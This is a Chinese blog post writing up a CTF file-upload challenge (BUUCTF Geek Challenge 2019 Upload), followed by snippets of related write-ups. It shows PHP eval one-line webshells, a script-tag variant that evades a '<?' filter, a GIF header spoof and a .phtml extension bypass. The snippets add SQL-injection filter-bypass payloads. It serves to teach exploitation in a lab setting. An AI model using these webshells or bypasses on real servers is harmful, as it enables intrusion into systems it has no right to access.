[极客大挑战 2019]Upload

最新推荐文章于 2025-02-24 20:24:42 发布
最新推荐文章于 2025-02-24 20:24:42 发布
阅读量232 收藏
点赞数
分类专栏: wp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_55234680/article/details/120771839
版权
本文详细描述了一次针对PHP文件上传漏洞的测试过程。通过尝试上传不同格式和内容的文件,包括.php、.jpg、.gif等,作者展示了如何利用文件头伪装和文件扩展名篡改来绕过安全检查,最终成功上传了恶意脚本并实现了执行。文章揭示了Web应用中文件上传安全的重要性,并暗示了可能的防御措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开题目,为文件上传

尝试上传后缀为php的木马

<?php @eval($_POST['door']); ?>

结果

Not image!

将后缀改为jpg,结果

NO! HACKER! your file included ‘<?’

将木马改为

<script language='php'>@eval($_POST['door']);</script>

再次上传,结果

Don’t lie to me, it’s not image at all!!!

添加jpg文件头,修改木马为

FFD8FF
<script language='php'>@eval($_POST['door']);</script>

上传,结果

Don’t lie to me, it’s not image at all!!!

把jpg文件头改为gif文件头

GIF8a
<script language='php'>@eval($_POST['door']);</script>

上传成功

上传文件名: a.jpg

通过抓包修改a.jpg为a.phtml

上传文件名:a.phtml

上传成功

扫描目录可以发现上传的文件在“upload”下
在这里插入图片描述
蚁剑连接即可

极客挑战2019-upload
m0_73303597的博客
12-11 426
自用
[极客挑战 2019]Upload 1
徐海洋
02-02 775
[极客挑战 2019]Upload 1
web buuctf [极客挑战 2019]Upload1
weixin_44214568的博客
09-04 667
1.随便上传一个东西,我上传的是一个txt文档,提示 "not image"; 2.不是图片格式,那就抓包改消息头 改为 : 上传后提示“don't lie to me,it's not image at all!" 应该是存在过滤,试试其他的格式: 改成php,提示“not php!” 改成php3,提示"not php3!" 之后又试了一下php4,也是不行, 最后试了一下phtml,提示“don't lie to me,it's not image at all!" 这样发现
buuctf web 极客挑战2019 Upload
Ethan552525的博客
09-12 904
题目: 解题: 1:上传“一句话木马”文件 编辑文件a.php: <?php @eval($_POST['shell']);?> 上传后得到: Not image! 提示需要上传文件为 image。 2:修改Content-Type 上传a.php文件时,用burp suite抓包得到: 修改Content-Type为 image/gif 提示:NOT ...
文件上传漏洞(buuctf极客挑战easy upload
qq_66013948的博客
09-26 345
这个语句被过滤了,只要出现了这个语句,就会被过滤,那么我们要试着绕过这个,当然,在绕过的途中可能会遇到其他的情况,例如遇到php被过滤之类的问题,不过这是有的题目才会出现的问题了,具体的题目要具体分析,有的题目过滤的关键词是不一样的,需要利用不同的语句进行绕过。一名网安工程师,最开始学的那几个漏洞之一学就是注入类漏洞,而注入的参数可以是get /post等参数,也可以是文件;首先,打开文件后,我们就可以看到一个上传图片的一个表单。那么,我们可以试着将这个文件变为phtml格式过后试着上传一下,得到的是。
BUUCTF[极客挑战 2019]BabySQL
网络空间安全学习
06-25 2344
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
CTF题 BUUCTF之[极客挑战 2019]Knife 1
weixin_44632787的博客
06-17 4077
CTF题 BUUCTF之[极客挑战 2019]Knife 1 启动我们的挑战项目 这里的题目简直就是在提示我们用中国菜刀连接,但是由于个人习惯这里我就用中国蚁剑来连接了。(其实中国蚁剑和中国菜刀的功能差不多,不过个人感觉蚁剑更好用一些吧)。 现在来打开我们的蚁剑工具 然后填上我们的连接和密码:Syc 然后进入到对方的登录后台 最后到这个后台的根目录下就可以找到flag值 如果你不能一下子就看出来是用蚁剑这些工具来连接,那可能是因为你做题的经验还不够。做多了自然而然就能想到了。总的来说,这题属于
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2731
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
BUUCTF 之 [极客挑战 2019] Havefun(GET 传参)
qq_59607911的博客
11-02 412
通过查看源码发现这是PHP的代码,上面说如果cat=dog那么它就会输出一个echo 'Syc{cat_cat_cat_cat}';我们可以发现这个格式和flag是非常相似的,因此我们就可以去构造一个cat=dog。既然什么都做不了,就只能去试试抓包和看源代码,这一题是有源码的,只需要右击页面打开源码就行了。打开连接之后会发现一个一只猫的页面,不可以点击,什么都做不了、
BUUCTF题解之[极客挑战 2019]Havefun 1
jungleirim的博客
10-17 875
使用浏览器开发者工具查看网页源码,查看疑似flag的代码。(特别是注释了的源码,一般是HTML,JS,PHP的源码)修改统一资源定位符URL访问服务器后端接口,拿到flag。
Buuctf—极客挑战练习
qq_45927819的博客
08-03 509
文章目录[极客挑战 2019]Knife 1[极客挑战 2019]Http 1[极客挑战 2019]Upload 1[极客挑战 2019]PHP 1 [极客挑战 2019]Knife 1 白给的shell 一句话木马 直接蚁剑或者菜刀连接 在根目录下得到flag [极客挑战 2019]Http 1 打开环境查看源码发现Secret.php: 访问一下: 也就是这个网页不是来自https://www.Sycsecret.com的 抓包,添加referer头,referer头就是证明你从哪
BUUCTF--极客挑战php
woshicainiao666的博客
03-06 1647
www.zip。
BUUCTF—极客挑战sql注入题
qq_45927819的博客
07-22 965
文章目录hard sql1、爆数据库2、爆表名3、爆列名4、爆值 hard sql 先fuzz测试一下 空格,union,and,=,/**/,+,等等都被过滤了 显然联合查询注入不能用了,报错注入的函数没被过滤,我们试一下 1、爆数据库 空格我们用()包裹 'or(extractvalue(1,concat(0x7e,database(),0x7e)))# 2、爆表名 = 我们用like绕过 'or(extractvalue(1,concat(0x7e,(select(table_name)from
BUUCTF中的web
2401_82388450的博客
04-22 919
1.先上传一个一句话木马的php文件,提示可以上传的文件类型。2.上传一个图片文件,抓包之后,修改文件后缀名。参数可能用于告诉服务器要加载或处理哪个文件。3.上传成功,用蚁剑连接,找到flag。注意要空一格,发现上传成功。
BUUCTF--[极客挑战 2019]RCE ME
2401_88083440的博客
02-24 1076
直接看代码主要是学习绕过匹配的方法。和。
BUUCTF题解之[极客挑战 2019]EasySQL 1
jungleirim的博客
10-17 509
SQL注入是一种针对Web应用程序的攻击技术,通过在应用程序的用户输入参数中嵌入SQL代码,进而攻击应用程序的数据库。攻击者可以通过SQL注入来获取敏感信息、执行无权执行的操作、甚至完全控制数据库服务器。SQL注入通常发生在Web应用程序中,因为Web应用程序使用输入参数来构建SQL语句,而这些输入参数往往不能被完全信任。攻击者可以利用这些输入参数来注入恶意代码,进而执行攻击。
BUUCTF [极客挑战 2019]BabySQL
m0_49025459的博客
05-15 624
打开环境看看,这一个登录界面 尝试万能密码无果,那么我们只能正常尝试注入,先判断列数 1' order by 1# 输入之后发生报错 发现这里or被过滤掉了 ,这里不论是写还是小写的or都被过滤了,但是在尝试双写绕过的时候成功了 username:admin' oorr '1'='1# password:123 这样我们就可以尝试又多少列了,但是我们在尝试的时候发现order,or,by都被过滤掉了,所以我们只能通过其他的方式进行测试。但是我们在测试的时候发现union,sel
[极客挑战 2019]upload
最新发布
04-02
### 如何参与极客挑战2019以及完成文件或作品的上传 #### 参与方式 华为云计划在未来两天举办一系列活动,其中包括丰富的专题论坛、圆桌论坛,还有Codelabs、极客挑战赛等活动[^1]。这些活动旨在让开发者能够与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值